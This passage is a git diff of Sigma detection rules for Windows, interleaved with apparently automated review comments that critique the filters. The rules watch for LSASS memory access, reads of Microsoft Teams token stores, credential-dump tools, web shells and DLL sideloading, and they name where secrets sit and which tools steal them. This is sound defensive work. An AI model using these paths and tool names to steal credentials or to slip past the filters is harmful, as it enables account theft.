b/rules/windows/builtin/security/win_susp_logon_newcredentials.yml similarity index 100% rename from rules/windows/builtin/win_susp_logon_newcredentials.yml rename to rules/windows/builtin/security/win_susp_logon_newcredentials.yml diff --git a/rules/windows/builtin/security/win_susp_lsass_dump_generic.yml b/rules/windows/builtin/security/win_susp_lsass_dump_generic.yml index 824d0f1ec..cc71a77b0 100644 --- a/rules/windows/builtin/security/win_susp_lsass_dump_generic.yml +++ b/rules/windows/builtin/security/win_susp_lsass_dump_generic.yml 
@@ -4,7 +4,7 @@ description: Detects process handle on LSASS process with certain access mask status: experimental author: Roberto Rodriguez, Teymur Kheirkhabarov, Dimitrios Slamaris, Mark Russinovich, Aleksey Potapov, oscd.community (update) date: 2019/11/01 -modified: 2022/04/29 +modified: 2022/09/27 references: - https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment @@ -64,12 +64,18 @@ detection: - C:\Windows\SysWow64\ - C:\Windows\SysNative\ - C:\Program Files\ + - C:\Program Files (x86)\ - C:\Windows\Temp\asgard2-agent\ - C:\ProgramData\Microsoft\Windows Defender\Platform\ filter2: ProcessName|startswith: 'C:\Program Files' # too many false positives with legitimate AV and EDR solutions filter3: ProcessName: 'C:\Windows\CCM\CcmExec.exe' + filter4: + ProcessName: 'C:\Windows\System32\taskhostw.exe' + AccessMask: + - '0x10' + - '0x1410' condition: 1 of selection_* and not 1 of filter* fields: - ComputerName diff --git a/rules/windows/builtin/security/win_teams_suspicious_objectaccess.yml b/rules/windows/builtin/security/win_teams_suspicious_objectaccess.yml new file mode 100644 index 000000000..e19c134ff --- /dev/null +++ b/rules/windows/builtin/security/win_teams_suspicious_objectaccess.yml 
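Review bot: The `C:\Program Files (x86)\` entry added to the first filter list is redundant: `filter2` already excludes anything matching `ProcessName|startswith: 'C:\Program Files'`, and that prefix covers the x86 folder. The new `filter4` is the better shape (process name and access mask together); a comment such as `# 0x10 = PROCESS_VM_READ; 0x1410 adds PROCESS_QUERY_INFORMATION and PROCESS_QUERY_LIMITED_INFORMATION` would explain why exactly those two masks are accepted for taskhostw.exe. All of these filters key on path alone, the trade-off the existing `filter2` comment already acknowledges; the added x86 line does not change that either way.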
@@ -0,0 +1,27 @@ +title: Suspicious Teams Application Related ObjectAcess Event +id: 25cde13e-8e20-4c29-b949-4e795b76f16f +status: experimental +description: Detects an access to authentication tokens and accounts of Microsoft Teams desktop application. +author: '@SerkinValery' +references: + - https://www.bleepingcomputer.com/news/security/microsoft-teams-stores-auth-tokens-as-cleartext-in-windows-linux-macs/ + - https://www.vectra.ai/blogpost/undermining-microsoft-teams-security-by-mining-tokens +date: 2022/09/16 +logsource: + product: windows + service: security +detection: + selection: + EventID: 4663 + ObjectName|contains: + - '\Microsoft\Teams\Cookies' + - '\Microsoft\Teams\Local Storage\leveldb' + filter: + ProcessName|contains: '\Microsoft\Teams\current\Teams.exe' + condition: selection and not filter +falsepositives: + - Unknown +level: high +tags: + - attack.credential_access + - attack.t1528 diff --git a/rules/windows/builtin/security_mitigations/win_security_mitigations_defender_load_unsigned_dll.yml b/rules/windows/builtin/security_mitigations/win_security_mitigations_defender_load_unsigned_dll.yml index e1cdc5070..aa7d64829 100644 --- a/rules/windows/builtin/security_mitigations/win_security_mitigations_defender_load_unsigned_dll.yml +++ b/rules/windows/builtin/security_mitigations/win_security_mitigations_defender_load_unsigned_dll.yml @@ -6,13 +6,13 @@ references: - https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool author: Bhabesh Raj date: 2022/08/02 -modified: 2022/08/05 +modified: 2022/09/28 tags: - attack.defense_evasion - attack.t1574.002 logsource: product: windows - category: security-mitigations + service: security-mitigations detection: selection: EventID: 
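Review bot: Event 4663 is only generated for objects that carry a SACL, so this rule stays silent unless object-access auditing is configured on the Teams `Cookies` and `Local Storage\leveldb` directories; that prerequisite belongs in the description or a comment, e.g. `# requires a SACL on the Teams profile folders; 4663 is not logged otherwise`. The title has a typo (`ObjectAcess` → `ObjectAccess`). The exclusion is `ProcessName|contains` on a path under the user profile, which is the normal Teams install location but also user-writable; stating that in the falsepositives section would help whoever tunes it.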
diff --git a/rules/windows/builtin/security_mitigations/win_security_mitigations_unsigned_dll_from_susp_location.yml b/rules/windows/builtin/security_mitigations/win_security_mitigations_unsigned_dll_from_susp_location.yml index 6c202bf1c..5e2c4ddce 100644 --- a/rules/windows/builtin/security_mitigations/win_security_mitigations_unsigned_dll_from_susp_location.yml +++ b/rules/windows/builtin/security_mitigations/win_security_mitigations_unsigned_dll_from_susp_location.yml @@ -6,13 +6,13 @@ references: - https://github.com/nasbench/EVTX-ETW-Resources/blob/45fd5be71a51aa518b1b36d4e1f36af498084e27/ETWEventsList/CSV/Windows11/21H2/W11_21H2_Pro_20220719_22000.795/Providers/Microsoft-Windows-Security-Mitigations.csv author: Nasreddine Bencherchali date: 2022/08/03 -modified: 2022/08/05 +modified: 2022/09/28 tags: - attack.defense_evasion - attack.t1574.002 logsource: product: windows - category: security-mitigations + service: security-mitigations detection: selection: EventID: diff --git a/rules/windows/builtin/smbclient/win_susp_failed_hidden_share_mount.yml b/rules/windows/builtin/smbclient/win_susp_failed_hidden_share_mount.yml new file mode 100644 index 000000000..fd5cdf40b --- /dev/null +++ b/rules/windows/builtin/smbclient/win_susp_failed_hidden_share_mount.yml 
@@ -0,0 +1,28 @@ +title: Failed Mounting of Hidden Share +id: 1c3be8c5-6171-41d3-b792-cab6f717fcdb +description: Detects repeated failed (outgoing) attempts to mount a hidden share +author: Fabian Franz +status: experimental +level: medium +references: + - https://twitter.com/moti_b/status/1032645458634653697 + - https://www.bsi.bund.de/SharedDocs/Downloads/EN/BSI/Cyber-Security/SiSyPHuS/AP10/Logging_Configuration_Guideline.pdf?__blob=publicationFile&v=5 +date: 2022/08/30 +modified: 2022/08/30 +logsource: + product: windows + service: smbclient-security +detection: + selection: + EventID: 31010 + ShareName|endswith: '$' + timeframe: 1m + condition: selection | count() > 10 +fields: + - ShareName +falsepositives: + - Legitimate administrative activity + - Faulty scripts +tags: + - attack.t1021.002 + - attack.lateral_movement diff --git a/rules/windows/dns_query/dns_query_win_susp_ldap.yml b/rules/windows/dns_query/dns_query_win_susp_ldap.yml index accfaf6e3..8acfb3fce 100644 --- a/rules/windows/dns_query/dns_query_win_susp_ldap.yml +++ b/rules/windows/dns_query/dns_query_win_susp_ldap.yml @@ -1,9 +1,9 @@ -title: Suspicious Ldap Domain Access +title: Suspicious LDAP Domain Access id: a21bcd7e-38ec-49ad-b69a-9ea17e69509e -description: Detect suspicious ldap request from non Windows application +description: Detect suspicious LDAP request from non-Windows application status: experimental date: 2022/08/20 -modified: 2022/09/08 +modified: 2022/09/21 author: frack113 references: - https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1482/T1482.md 
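Review bot: `condition: selection | count() > 10` has no `by` clause, so the threshold is evaluated over all 31010 events in the timeframe regardless of source host or target server, and ten scattered failures across a fleet will alert; `count() by <originating host or user field> > 10` (whichever field the SMBClient/Security event exposes in your pipeline) is what "repeated attempts" in the description implies. `ShareName|endswith: '$'` also includes `IPC$`, whose failed connections are routine noise; consider excluding it or listing the administrative shares you care about. `modified` equals `date`, and `level` sits between `status` and `references`, which differs from the key ordering used by the other rules in this diff.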
@@ -16,10 +16,15 @@ detection: filter_windows: Image|startswith: 'C:\Windows\' filter_defender: - Image|startswith: 'C:\ProgramData\Microsoft\Windows Defender\Platform\' + Image|startswith: + - 'C:\ProgramData\Microsoft\Windows Defender\Platform\' + - 'C:\Program Files\Windows Defender\MsMpEng.exe' + - 'C:\Program Files (x86)\Windows Defender\MsMpEng.exe' Image|endswith: '\MsMpEng.exe' filter_unknown: Image: '' + filter_azure: + Image|startswith: 'C:\WindowsAzure\GuestAgent' condition: dns_request and not 1 of filter_* falsepositives: - Programs that also lookup the observed domain diff --git a/rules/windows/file_delete/file_delete_win_sysinternals_sdelete_file_deletion.yml b/rules/windows/file_delete/file_delete_win_sysinternals_sdelete_file_deletion.yml index be3e39dc3..64ea228a5 100644 --- a/rules/windows/file_delete/file_delete_win_sysinternals_sdelete_file_deletion.yml +++ b/rules/windows/file_delete/file_delete_win_sysinternals_sdelete_file_deletion.yml 
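Review bot: The two new Defender entries under `Image|startswith` are complete executable paths, so `startswith` acts as an exact match for them while the first entry is a directory prefix, and the separate `Image|endswith: '\MsMpEng.exe'` becomes redundant for those two; splitting this into a directory-prefix filter and an `Image:` exact-value list would make the intent clearer. `filter_azure` excludes every image under `C:\WindowsAzure\GuestAgent`, which presumably targets the versioned agent folders but also anything else placed beneath that prefix; a comment naming the expected binary would help future tuning. The `dns_request` selection is outside the hunk.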
@@ -4,22 +4,24 @@ status: test description: A General detection to trigger for the deletion of files by Sysinternals SDelete. It looks for the common name pattern used to rename files. author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) references: - - https://github.com/OTRF/detection-hackathon-apt29/issues/9 - - https://threathunterplaybook.com/evals/apt29/detections/4.B.4_83D62033-105A-4A02-8B75-DAB52D8D51EC.html + - https://github.com/OTRF/detection-hackathon-apt29/issues/9 + - https://threathunterplaybook.com/evals/apt29/detections/4.B.4_83D62033-105A-4A02-8B75-DAB52D8D51EC.html date: 2020/05/02 -modified: 2021/11/27 +modified: 2022/09/21 logsource: - product: windows - category: file_delete + product: windows + category: file_delete detection: - selection: - TargetFilename|endswith: - - '.AAA' - - '.ZZZ' - condition: selection + selection: + TargetFilename|endswith: + - '.AAA' + - '.ZZZ' + filter_wireshark: + TargetFilename|endswith: '\Wireshark\radius\dictionary.alcatel-lucent.aaa' + condition: selection and not 1 of filter_* falsepositives: - - Legitime usage of SDelete + - Legitime usage of SDelete level: medium tags: - - attack.defense_evasion - - attack.t1070.004 + - attack.defense_evasion + - attack.t1070.004 diff --git a/rules/windows/file_event/file_event_win_access_susp_teams.yml b/rules/windows/file_event/file_event_win_access_susp_teams.yml new file mode 100644 index 000000000..332a8a19c --- /dev/null +++ b/rules/windows/file_event/file_event_win_access_susp_teams.yml 
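Review bot: The falsepositives entry still reads `Legitime usage of SDelete`; since that line is rewritten in this hunk, `- Legitimate usage of SDelete` fixes the spelling. `filter_wireshark` is keyed on the file name alone, which is fine for a fixed dictionary path, but a comment such as `# Wireshark ships a RADIUS dictionary whose extension happens to be .aaa` would tell readers why a `.AAA`-ending file is excluded from an SDelete rule. The `.AAA`/`.ZZZ` pattern itself is unchanged and remains the whole detection.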
@@ -0,0 +1,26 @@ +title: Suspicious File Event With Teams Objects +id: 6902955a-01b7-432c-b32a-6f5f81d8f624 +status: experimental +description: Detects an access to authentication tokens and accounts of Microsoft Teams desktop application. +author: '@SerkinValery' +references: + - https://www.bleepingcomputer.com/news/security/microsoft-teams-stores-auth-tokens-as-cleartext-in-windows-linux-macs/ + - https://www.vectra.ai/blogpost/undermining-microsoft-teams-security-by-mining-tokens +date: 2022/09/16 +logsource: + product: windows + category: file_event +detection: + selection: + TargetFilename|contains: + - '\Microsoft\Teams\Cookies' + - '\Microsoft\Teams\Local Storage\leveldb' + filter: + Image|contains: '\Microsoft\Teams\current\Teams.exe' + condition: selection and not filter +falsepositives: + - Unknown +level: high +tags: + - attack.credential_access + - attack.t1528 diff --git a/rules/windows/file_event/file_event_win_cred_dump_tools_dropped_files.yml b/rules/windows/file_event/file_event_win_cred_dump_tools_dropped_files.yml index 4c07b444c..4f1bf73ac 100755 --- a/rules/windows/file_event/file_event_win_cred_dump_tools_dropped_files.yml +++ b/rules/windows/file_event/file_event_win_cred_dump_tools_dropped_files.yml @@ -6,7 +6,7 @@ author: Teymur Kheirkhabarov, oscd.community references: - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment date: 2019/11/01 -modified: 2022/01/11 +modified: 2022/09/21 logsource: category: file_event product: windows @@ -38,6 +38,7 @@ detection: - '\servpw64.exe' - '\pwdump.exe' - '\procdump64.exe' + - '\Dumpy.exe' condition: selection falsepositives: - Legitimate Administrator using tool for password recovery diff --git a/rules/windows/file_event/file_event_win_notepad_plus_plus_persistence.yml b/rules/windows/file_event/file_event_win_notepad_plus_plus_persistence.yml index 96e397ca5..d684b222a 100644 --- a/rules/windows/file_event/file_event_win_notepad_plus_plus_persistence.yml 
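Review bot: The description claims to detect "access to authentication tokens", but a Sigma `file_event` logsource maps to file-creation telemetry (for example Sysmon event 11), so this rule only fires when a non-Teams process writes or creates a file under the Cookies/leveldb paths, never when one reads them; `description: Detects file creation under the Microsoft Teams token and cookie storage paths by a process other than Teams` states what is matched. The read case is what the security-log sibling added in this commit (event 4663) covers, so linking the two through `related` would stop readers treating this one as a read detector. The `Image|contains` exclusion lies under the user profile, the same caveat as in that sibling.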
+++ b/rules/windows/file_event/file_event_win_notepad_plus_plus_persistence.yml @@ -6,7 +6,7 @@ author: Nasreddine Bencherchali references: - https://pentestlab.blog/2022/02/14/persistence-notepad-plugins/ date: 2022/06/10 -modified: 2022/06/21 +modified: 2022/09/20 logsource: product: windows category: file_event @@ -20,7 +20,9 @@ detection: # This filter is for Sigma dataset you could remove it or change when using the rule in your own env Image|startswith: 'C:\Users\' Image|contains: '\AppData\Local\Temp\' - Image|endswith: '\target.exe' + Image|endswith: + - '\target.exe' + - 'Installer.x64.exe' condition: selection and not 1 of filter* falsepositives: - Possible FPs during first installation of Notepad++ diff --git a/rules/windows/file_event/file_event_win_ripzip_attack.yml b/rules/windows/file_event/file_event_win_ripzip_attack.yml index 7f71a7886..78039d23b 100644 --- a/rules/windows/file_event/file_event_win_ripzip_attack.yml +++ b/rules/windows/file_event/file_event_win_ripzip_attack.yml @@ -15,7 +15,7 @@ logsource: product: windows detection: selection: # %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\target.lnk.{0AFACED1-E828-11D1-9187-B532F1E9575D}\target.lnk - TargetFileName|contains|all: + TargetFilename|contains|all: - '\Microsoft\Windows\Start Menu\Programs\Startup' - '.lnk.{0AFACED1-E828-11D1-9187-B532F1E9575D}' Image|endswith: '\explorer.exe' diff --git a/rules/windows/file_event/file_event_win_susp_desktop_ini.yml b/rules/windows/file_event/file_event_win_susp_desktop_ini.yml index 3dbda7a44..3ac6496fb 100755 --- a/rules/windows/file_event/file_event_win_susp_desktop_ini.yml +++ b/rules/windows/file_event/file_event_win_susp_desktop_ini.yml 
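Review bot: The new `'Installer.x64.exe'` value has no leading backslash, unlike `'\target.exe'`, so it matches any image whose name merely ends in those characters; that is probably wanted for the versioned Notepad++ installer name, but `# matches the versioned npp.<version>.Installer.x64.exe name` would make it deliberate. The comment above already flags this filter as dataset-specific and rooted in a user-writable `\AppData\Local\Temp\` path; widening it with a second pattern enlarges that exclusion, which the falsepositives section should state. The selection block is outside the hunk.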
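Review bot: Changing `TargetFileName` to `TargetFilename` alters behaviour — with the wrong field name the rule could never match on a strict backend — yet no `modified:` bump appears in the hunk, unlike the other rules in this commit. The hunk header is `@@ -15,7 +15,7 @@`, so the rule's metadata lines, including any `modified` field, lie above it and outside the view; if the field exists it should be updated alongside this fix.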
@@ -4,25 +4,28 @@ status: test description: Detects unusual processes accessing desktop.ini, which can be leveraged to alter how Explorer displays a folder's content (i.e. renaming files) without changing them on disk. author: Maxime Thiebaut (@0xThiebaut), Tim Shelton (HAWK.IO) references: - - https://isc.sans.edu/forums/diary/Desktopini+as+a+postexploitation+tool/25912/ + - https://isc.sans.edu/forums/diary/Desktopini+as+a+postexploitation+tool/25912/ date: 2020/03/19 -modified: 2021/12/03 +modified: 2022/09/20 logsource: - product: windows - category: file_event + product: windows + category: file_event detection: - selection: - TargetFilename|endswith: '\desktop.ini' - filter: - Image|startswith: - - 'C:\Windows\' - - 'C:\Program Files\' - - 'C:\Program Files (x86)\' - condition: selection and not filter + selection: + TargetFilename|endswith: '\desktop.ini' + filter_generic: + Image|startswith: + - 'C:\Windows\' + - 'C:\Program Files\' + - 'C:\Program Files (x86)\' + filter_jetbrains: + Image|endswith: '\AppData\Local\JetBrains\Toolbox\bin\7z.exe' + TargetFilename|contains: '\JetBrains\apps\' + condition: selection and not 1 of filter_* falsepositives: - - Operations performed through Windows SCCM or equivalent - - Read only access list authority + - Operations performed through Windows SCCM or equivalent + - Read only access list authority level: medium tags: - - attack.persistence - - attack.t1547.009 + - attack.persistence + - attack.t1547.009 diff --git a/rules/windows/file_event/file_event_win_susp_teamviewer_remote_session.yml b/rules/windows/file_event/file_event_win_susp_teamviewer_remote_session.yml index 8d6fd06ce..bc6e34bd4 100644 --- a/rules/windows/file_event/file_event_win_susp_teamviewer_remote_session.yml +++ b/rules/windows/file_event/file_event_win_susp_teamviewer_remote_session.yml 
@@ -14,11 +14,11 @@ logsource: category: file_event detection: selection1: - TargetFilename|endswith: + TargetFilename|endswith: - '\TeamViewer\RemotePrinting\tvprint.db' - '\TeamViewer\TVNetwork.log' selection2: - TargetFilename|contains|all: + TargetFilename|contains|all: - '\TeamViewer' - '_Logfile.log' condition: 1 of selection* diff --git a/rules/windows/file_event/file_event_win_webshell_creation_detect.yml b/rules/windows/file_event/file_event_win_webshell_creation_detect.yml index eda1ef802..5d246108f 100755 --- a/rules/windows/file_event/file_event_win_webshell_creation_detect.yml +++ b/rules/windows/file_event/file_event_win_webshell_creation_detect.yml 
@@ -6,37 +6,34 @@ author: Beyu Denis, oscd.community, Tim Shelton references: - PT ESC rule and personal experience date: 2019/10/22 -modified: 2022/05/24 +modified: 2022/09/18 logsource: product: windows category: file_event detection: - selection_2: + selection_wwwroot: TargetFilename|contains: '\inetpub\wwwroot\' - selection_3: + selection_ext1: TargetFilename|contains: - '.asp' - '.ashx' - '.ph' - selection_4: + selection_static: TargetFilename|contains: - '\www\' - '\htdocs\' - '\html\' - selection_5: + selection_ext2: TargetFilename|contains: '.ph' - selection_6: - - TargetFilename|endswith: '.jsp' - - TargetFilename|contains|all: - - '\cgi-bin\' - - '.pl' false_positive1: # false positives when unpacking some executables in $TEMP TargetFilename|contains: - '\AppData\Local\Temp\' - '\Windows\Temp\' - false_positive2: + false_positive_system: Image: 'System' # fp : backup/restore from drivers - condition: not false_positive2 and ( (selection_2 and selection_3 and not false_positive1) or (selection_4 and selection_5 and not false_positive1) or (selection_6 and not false_positive1) ) + false_positive_legitimate: + TargetFilename|contains: '\xampp' + condition: ((selection_wwwroot and selection_ext1) or (selection_static and selection_ext2)) and not 1 of false_positive* falsepositives: - Legitimate administrator or developer creating legitimate executable files in a web application folder level: high diff --git a/rules/windows/file_event/file_event_win_win_shell_write_susp_files_extensions.yml b/rules/windows/file_event/file_event_win_win_shell_write_susp_files_extensions.yml index b7ed4cd61..7747fcde6 100644 --- a/rules/windows/file_event/file_event_win_win_shell_write_susp_files_extensions.yml +++ b/rules/windows/file_event/file_event_win_win_shell_write_susp_files_extensions.yml 
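Review bot: `false_positive_legitimate` with `TargetFilename|contains: '\xampp'` excludes every path inside an XAMPP installation, including its `htdocs` web root, which is exactly the location this rule is meant to watch on such hosts; narrow it to the installer/temp path that produced the false positive or pair it with the installer's `Image`. The removal of `selection_6` also silently drops the `.jsp` and `\cgi-bin\` + `.pl` coverage, so Java and Perl web shells no longer match; if that is intended, say so in the description or `falsepositives`, otherwise fold those patterns into `selection_ext1`/`selection_ext2`. The condition change itself is fine, since `1 of false_positive*` now covers the three named exclusions.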
@@ -18,7 +18,7 @@ detection: Image|endswith: - '\rundll32.exe' #- '\svchost.exe' # Might generate some FP - - '\dllhost.exe' + #- '\dllhost.exe' # Too many FPs - '\smss.exe' - '\RuntimeBroker.exe' - '\sihost.exe' diff --git a/rules/windows/file_rename/file_rename_win_ransomware.yml b/rules/windows/file_rename/file_rename_win_ransomware.yml index 72d05ff25..3926f3b6e 100644 --- a/rules/windows/file_rename/file_rename_win_ransomware.yml +++ b/rules/windows/file_rename/file_rename_win_ransomware.yml @@ -7,7 +7,7 @@ references: - https://blog.cyble.com/2022/08/10/onyx-ransomware-renames-its-leak-site-to-vsop/ author: frack113 date: 2022/07/16 -modified: 2022/08/31 +modified: 2022/09/20 tags: - attack.impact - attack.t1486 @@ -26,7 +26,7 @@ detection: - '.jpeg' - '.png' - '.pdf' - TargetFilename|contains: + TargetFilename|contains: - '.lnk.' - '.rtf.' - '.pst.' @@ -36,7 +36,7 @@ detection: - '.jpeg.' - '.png.' - '.pdf.' - filter: + filter_generic: TargetFilename|endswith: - '.tmp' - '.bak' @@ -44,7 +44,10 @@ detection: - '.orig' - '.backup' - '.temp' - condition: selection and not filter + filter_anaconda: + TargetFilename|startswith: 'C:\ProgramData\Anaconda3\' + TargetFilename|endswith: '.c~' + condition: selection and not 1 of filter_* falsepositives: - Backup software level: medium diff --git a/rules/windows/image_load/image_load_side_load_antivirus.yml b/rules/windows/image_load/image_load_side_load_antivirus.yml index fd929f098..ce7c17e00 100644 --- a/rules/windows/image_load/image_load_side_load_antivirus.yml +++ b/rules/windows/image_load/image_load_side_load_antivirus.yml @@ -6,6 +6,7 @@ references: - https://hijacklibs.net/ # For list of DLLs that could be sideloaded (search for dlls mentioned here in there) author: Nasreddine Bencherchali, Wietze Beukema (project and research) date: 2022/08/17 +modified: 2022/09/21 tags: - attack.defense_evasion - attack.persistence 
@@ -19,10 +20,13 @@ detection: # Bitdefender selection_bitdefender: ImageLoaded|endswith: '\log.dll' - filter_bitdefender: + filter_log_dll_bitdefender: ImageLoaded|startswith: - 'C:\Program Files\Bitdefender Antivirus Free\' - 'C:\Program Files (x86)\Bitdefender Antivirus Free\' + filter_log_dll_other: + - ImageLoaded: 'C:\Program Files\Dell\SARemediation\plugin\log.dll' + - ImageLoaded|startswith: 'C:\Program Files\Canon\MyPrinter\' # F-Secure selection_fsecure: ImageLoaded|endswith: '\qrt.dll' @@ -40,7 +44,9 @@ detection: ImageLoaded|startswith: - 'C:\Program Files\McAfee\' - 'C:\Program Files (x86)\McAfee\' - condition: (selection_bitdefender and not filter_bitdefender) or (selection_fsecure and not filter_fsecure) or (selection_mcafee and not filter_mcafee) + condition: (selection_bitdefender and not 1 of filter_log_dll_*) or (selection_fsecure and not filter_fsecure) or (selection_mcafee and not filter_mcafee) falsepositives: - - Unknown + - Applications that load the same dlls mentioned in the detection section. Investigate them and filter them out if a lot FPs are caused. + - Dell SARemediation plugin folder (C:\Program Files\Dell\SARemediation\plugin\log.dll) is known to contain the 'log.dll' file. + - The Canon MyPrinter folder 'C:\Program Files\Canon\MyPrinter\' is known to contain the 'log.dll' file level: medium diff --git a/rules/windows/image_load/image_load_side_load_from_non_system_location.yml b/rules/windows/image_load/image_load_side_load_from_non_system_location.yml index acbbd1f87..53f7ec255 100644 --- a/rules/windows/image_load/image_load_side_load_from_non_system_location.yml +++ b/rules/windows/image_load/image_load_side_load_from_non_system_location.yml 
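Review bot: `filter_log_dll_other` keys only on `ImageLoaded`, so any process loading `C:\Program Files\Dell\SARemediation\plugin\log.dll` or any `log.dll` found anywhere under `C:\Program Files\Canon\MyPrinter\` is excluded, regardless of which executable loads it, which is the condition the rule exists to check. Pairing each entry with the expected host process (e.g. `Image|startswith: 'C:\Program Files\Canon\MyPrinter\'` in the same map, and the Dell remediation executable for the first entry — exact name to be confirmed) keeps the false-positive fix without giving up the process/DLL relationship. The third `falsepositives` bullet is missing its closing period.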
@@ -8,7 +8,7 @@ references: - https://blog.cyble.com/2022/07/27/targeted-attacks-being-carried-out-via-dll-sideloading/ # iphlpapi.dll author: Nasreddine Bencherchali, Wietze Beukema (project and research), Chris Spehn (research WFH Dridex) date: 2022/08/14 -modified: 2022/09/11 +modified: 2022/09/27 tags: - attack.defense_evasion - attack.persistence @@ -416,11 +416,15 @@ detection: - 'C:\Windows\SysWOW64\' - 'C:\Windows\WinSxS\' - 'C:\Windows\SoftwareDistribution\' - filter_systemp: - ImageLoaded|startswith: 'C:\Windows\SystemTemp\' + - 'C:\Windows\SystemTemp\' filter_appvpolicy: - ImageLoaded: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVPolicy.dll - Image: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe + ImageLoaded: 'C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVPolicy.dll' + Image: 'C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe' + filter_azure: + ImageLoaded|startswith: 'C:\Packages\Plugins\Microsoft.GuestConfiguration.ConfigurationforWindows\' + filter_dell: + Image: 'C:\Windows\System32\backgroundTaskHost.exe' + ImageLoaded|startswith: 'C:\Program Files\WindowsApps\DellInc.DellSupportAssistforPCs' condition: selection and not 1 of filter_* falsepositives: - Legitimate applications loading their own versions of the DLLs mentioned in this rule diff --git a/rules/windows/image_load/image_load_susp_dbghelp_dbgcore_load.yml b/rules/windows/image_load/image_load_susp_dbghelp_dbgcore_load.yml index c3d02ecdd..36d307d82 100755 --- a/rules/windows/image_load/image_load_susp_dbghelp_dbgcore_load.yml +++ b/rules/windows/image_load/image_load_susp_dbghelp_dbgcore_load.yml @@ -8,7 +8,7 @@ references: - https://www.pinvoke.net/default.aspx/dbghelp/MiniDumpWriteDump.html - https://medium.com/@fsx30/bypass-edrs-memory-protection-introduction-to-hooking-2efb21acffd6 date: 2019/10/27 -modified: 2022/08/09 +modified: 2022/09/15 logsource: category: image_load product: windows 
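Review bot: `filter_azure` excludes every DLL load from `C:\Packages\Plugins\Microsoft.GuestConfiguration.ConfigurationforWindows\` for any `Image`; unlike `filter_dell`, which pins `Image` to `backgroundTaskHost.exe`, it should carry an `Image|startswith` on the same plugin tree so that only the plugin's own processes are excluded. The `filter_dell` value `'C:\Program Files\WindowsApps\DellInc.DellSupportAssistforPCs'` ends without a trailing backslash, so it also matches sibling package folders sharing that prefix; if that is deliberate because the folder carries a version suffix, a short comment saying so would help. The `selection` block that the moved `SystemTemp` entry belongs to starts outside the hunk.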
@@ -35,7 +35,7 @@ detection: - '\cscript.exe' - '\mshta.exe' # - '\regsvr32.exe' triggered by installing common software - - '\schtasks.exe' + # - '\schtasks.exe' triggered by installing software - '\dnx.exe' - '\regsvcs.exe' - '\sc.exe' diff --git a/rules/windows/image_load/image_load_susp_python_image_load.yml b/rules/windows/image_load/image_load_susp_python_image_load.yml index 79b4ceff8..9b071a802 100644 --- a/rules/windows/image_load/image_load_susp_python_image_load.yml +++ b/rules/windows/image_load/image_load_susp_python_image_load.yml 
@@ -3,29 +3,31 @@ id: cbb56d62-4060-40f7-9466-d8aaf3123f83 description: Detects the image load of Python Core indicative of a Python script bundled with Py2Exe. status: experimental date: 2020/05/03 -modified: 2021/12/05 +modified: 2022/09/21 author: Patrick St. John, OTR (Open Threat Research) tags: - - attack.defense_evasion - - attack.t1027.002 + - attack.defense_evasion + - attack.t1027.002 references: - - https://www.py2exe.org/ - - https://unit42.paloaltonetworks.com/unit-42-technical-analysis-seaduke/ + - https://www.py2exe.org/ + - https://unit42.paloaltonetworks.com/unit-42-technical-analysis-seaduke/ logsource: - product: windows - category: image_load + product: windows + category: image_load detection: - selection: - Description: 'Python Core' - filter: - - Image|contains: - - 'Python' # FPs with python38.dll, python.exe etc. - - Image|startswith: - - 'C:\Program Files\' - - 'C:\Program Files (x86)\' - condition: selection and not filter + selection: + Description: 'Python Core' + filter: + - Image|contains: + - 'Python' # FPs with python38.dll, python.exe etc. + - Image|startswith: + - 'C:\Program Files\' + - 'C:\Program Files (x86)\' + - 'C:\ProgramData\Anaconda3\' # Comment out if you don't use Anaconda in your environment + condition: selection and not filter fields: - - Description + - Description falsepositives: - - Legit Py2Exe Binaries -level: medium \ No newline at end of file + - Legitimate Py2Exe Binaries + - Known false positive caused with Python Anaconda +level: medium diff --git a/rules/windows/image_load/image_load_uipromptforcreds_dlls.yml b/rules/windows/image_load/image_load_uipromptforcreds_dlls.yml index e82154a0b..eac2f40fa 100644 --- a/rules/windows/image_load/image_load_uipromptforcreds_dlls.yml +++ b/rules/windows/image_load/image_load_uipromptforcreds_dlls.yml 
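Review bot: The new `'C:\ProgramData\Anaconda3\'` exclusion is weaker than the two `Program Files` entries it sits next to, because the `ProgramData` root typically lets standard users create subfolders, so this prefix can exist on machines without Anaconda. Since the commit already comments "Comment out if you don't use Anaconda", consider shipping it commented out by default, or making it a separate filter map that combines `Image|startswith: 'C:\ProgramData\Anaconda3\'` with `Image|endswith: '\python.exe'` (the interpreter path this commit uses elsewhere as `C:\ProgramData\Anaconda3\python.exe`), accepting that other Anaconda tools loading Python Core would still need their own entry.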
@@ -3,7 +3,7 @@ id: 9ae01559-cf7e-4f8e-8e14-4c290a1b4784 description: Detects potential use of UIPromptForCredentials functions by looking for some of the DLLs needed for it. status: experimental date: 2020/10/20 -modified: 2022/08/13 +modified: 2022/09/21 author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) tags: - attack.credential_access @@ -27,18 +27,26 @@ detection: filter_start: Image|startswith: - 'C:\Windows\System32\' - - 'C:\Windows\explorer.exe' + - 'C:\Windows\SysWOW64\' - 'C:\Program Files\' - 'C:\Program Files (x86)\' filter_end: - Image|endswith: '\opera_autoupdate.exe' + Image|endswith: + - '\opera_autoupdate.exe' + - '\procexp64.exe' + - '\procexp.exe' filter_full: - Image: 'C:\Windows\ImmersiveControlPanel\SystemSettings.exe' + Image: + - 'C:\Windows\ImmersiveControlPanel\SystemSettings.exe' + - 'C:\Windows\explorer.exe' filter_user: Image|startswith: 'C:\Users\' - Image|endswith: '\AppData\Roaming\Spotify\Spotify.exe' - filter_path: - Image|contains: '\Local\Microsoft\OneDrive\' + Image|endswith: + - '\AppData\Roaming\Spotify\Spotify.exe' + - '\AppData\Local\Microsoft\Teams\current\Teams.exe' + filter_contains: + Image|startswith: 'C:\Users\' + Image|contains: 